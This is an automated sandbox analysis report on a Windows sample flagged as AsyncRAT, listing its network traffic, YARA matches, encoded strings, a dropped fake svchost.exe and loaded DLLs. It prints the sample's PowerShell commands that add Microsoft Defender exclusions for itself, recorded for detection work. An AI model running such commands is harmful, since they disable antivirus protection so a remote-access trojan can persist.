                        Source: powershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000001.00000002.1758662678.0000021F90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1860676438.000001B6CE7C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2049175145.000001D6D8F83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49749 version: TLS 1.2
                        Source: C:\Users\user\Desktop\file.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                        Operating System Destruction

                        barindex
                        Source: C:\Users\user\Desktop\file.exeProcess information set: 01 00 00 00 Jump to behavior

                        System Summary

                        barindex
                        Source: file.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.0.file.exe.5c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000000.00000000.1674417480.00000000005C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\svchost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD9A3BEAD80_2_00007FFD9A3BEAD8
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD9A3B17290_2_00007FFD9A3B1729
                        Source: C:\Users\user\AppData\Local\svchost.exeCode function: 13_2_00007FFD9A3B172913_2_00007FFD9A3B1729
                        Source: C:\Users\user\AppData\Local\svchost.exeCode function: 13_2_00007FFD9A3B0EFA13_2_00007FFD9A3B0EFA
                        Source: C:\Users\user\AppData\Local\svchost.exeCode function: 15_2_00007FFD9A3E172915_2_00007FFD9A3E1729
                        Source: C:\Users\user\AppData\Local\svchost.exeCode function: 15_2_00007FFD9A3E0EFA15_2_00007FFD9A3E0EFA
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: file.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.0.file.exe.5c0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000000.00000000.1674417480.00000000005C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Local\svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: file.exe, NOeCVae6fB2zjxBAfc14EmLdOosAsYjlNm.csCryptographic APIs: 'TransformFinalBlock'
                        Source: file.exe, qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.csCryptographic APIs: 'TransformFinalBlock'
                        Source: file.exe, qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.csCryptographic APIs: 'TransformFinalBlock'
                        Source: svchost.exe.0.dr, NOeCVae6fB2zjxBAfc14EmLdOosAsYjlNm.csCryptographic APIs: 'TransformFinalBlock'
                        Source: svchost.exe.0.dr, qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.csCryptographic APIs: 'TransformFinalBlock'
                        Source: svchost.exe.0.dr, qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.csCryptographic APIs: 'TransformFinalBlock'
                        Source: file.exe, ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.csBase64 encoded string: 'ta7GHZZtD9Rz9IBXmd/SpSUoGBZgF8D2U0oyAOugQ4G6hHShXsyaGQ2h8riD1hV1', 'UNfylT+ryI+XA32XWRzLnhoMnqJUBvWEg8rgYaRQtvF9wcNAO6k744MbWWjJRb2q', 'tkS+N2y8FkE/r23RNPy9SCqUiE5h5Li6jxPBYAdlAIjh5tIKqb/fkKLTy+L2Gxag', 'iY7f7aTbdJawkU6QvQRhrlcMmB/lqyxnCZoNZrmcP3abgn7O/Y3/4sJ6jS3+zDQV'
                        Source: file.exe, ke6P6rtJCZBKy9hI.csBase64 encoded string: 'O46K0znAANd6Cs48nFx1Ftd2U7elGFLnRf429fMlXFzEmmEUd6ziq5iuasvezPiGhcKEhMhGrCGQXdLAV5iW', 'sXP3Zf4kA5Vt7mYQlkzVHJpUmfwYCi5XAvQ87JPTIxj5DvLqtqIE9acLV51H2gGxUyqkYzgwvbiuupwjK7my', 'IWhXJG0jCqHLgL4Bw9TOYnQmV6wz1ncGepE8Pxh6EsXBpwIE1ABJWDlfCCz0LCK4H21jztKUYP4dnSNhYdmp', 'p2MQSqhbr3NQ2evxyCDUsWKg7OAiwLoukyjrQnXT6YXpzztfrp2fMKXob27vkcv7M9DEeGGYGQBxb1tOcBri', 'xhNxCMrPSGqhfIo1Vila4F7nkyrLVDAy4G5ZYH7EztvXrsGmRDWLOzFiIeqJroacZWU7iS5N6KBLDewXc2rI'
                        Source: svchost.exe.0.dr, ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.csBase64 encoded string: 'ta7GHZZtD9Rz9IBXmd/SpSUoGBZgF8D2U0oyAOugQ4G6hHShXsyaGQ2h8riD1hV1', 'UNfylT+ryI+XA32XWRzLnhoMnqJUBvWEg8rgYaRQtvF9wcNAO6k744MbWWjJRb2q', 'tkS+N2y8FkE/r23RNPy9SCqUiE5h5Li6jxPBYAdlAIjh5tIKqb/fkKLTy+L2Gxag', 'iY7f7aTbdJawkU6QvQRhrlcMmB/lqyxnCZoNZrmcP3abgn7O/Y3/4sJ6jS3+zDQV'
                        Source: svchost.exe.0.dr, ke6P6rtJCZBKy9hI.csBase64 encoded string: 'O46K0znAANd6Cs48nFx1Ftd2U7elGFLnRf429fMlXFzEmmEUd6ziq5iuasvezPiGhcKEhMhGrCGQXdLAV5iW', 'sXP3Zf4kA5Vt7mYQlkzVHJpUmfwYCi5XAvQ87JPTIxj5DvLqtqIE9acLV51H2gGxUyqkYzgwvbiuupwjK7my', 'IWhXJG0jCqHLgL4Bw9TOYnQmV6wz1ncGepE8Pxh6EsXBpwIE1ABJWDlfCCz0LCK4H21jztKUYP4dnSNhYdmp', 'p2MQSqhbr3NQ2evxyCDUsWKg7OAiwLoukyjrQnXT6YXpzztfrp2fMKXob27vkcv7M9DEeGGYGQBxb1tOcBri', 'xhNxCMrPSGqhfIo1Vila4F7nkyrLVDAy4G5ZYH7EztvXrsGmRDWLOzFiIeqJroacZWU7iS5N6KBLDewXc2rI'
                        Source: svchost.exe.0.dr, ke6P6rtJCZBKy9hI.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: svchost.exe.0.dr, ke6P6rtJCZBKy9hI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: file.exe, ke6P6rtJCZBKy9hI.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: file.exe, ke6P6rtJCZBKy9hI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.evad.winEXE@15/21@1/2
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\svchost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\svchost.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\M16cgyrAaBGwyqZG
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                        Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: file.exeReversingLabs: Detection: 76%
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Local\svchost.exe "C:\Users\user\AppData\Local\svchost.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\svchost.exe "C:\Users\user\AppData\Local\svchost.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: avicap32.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: msvfw32.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
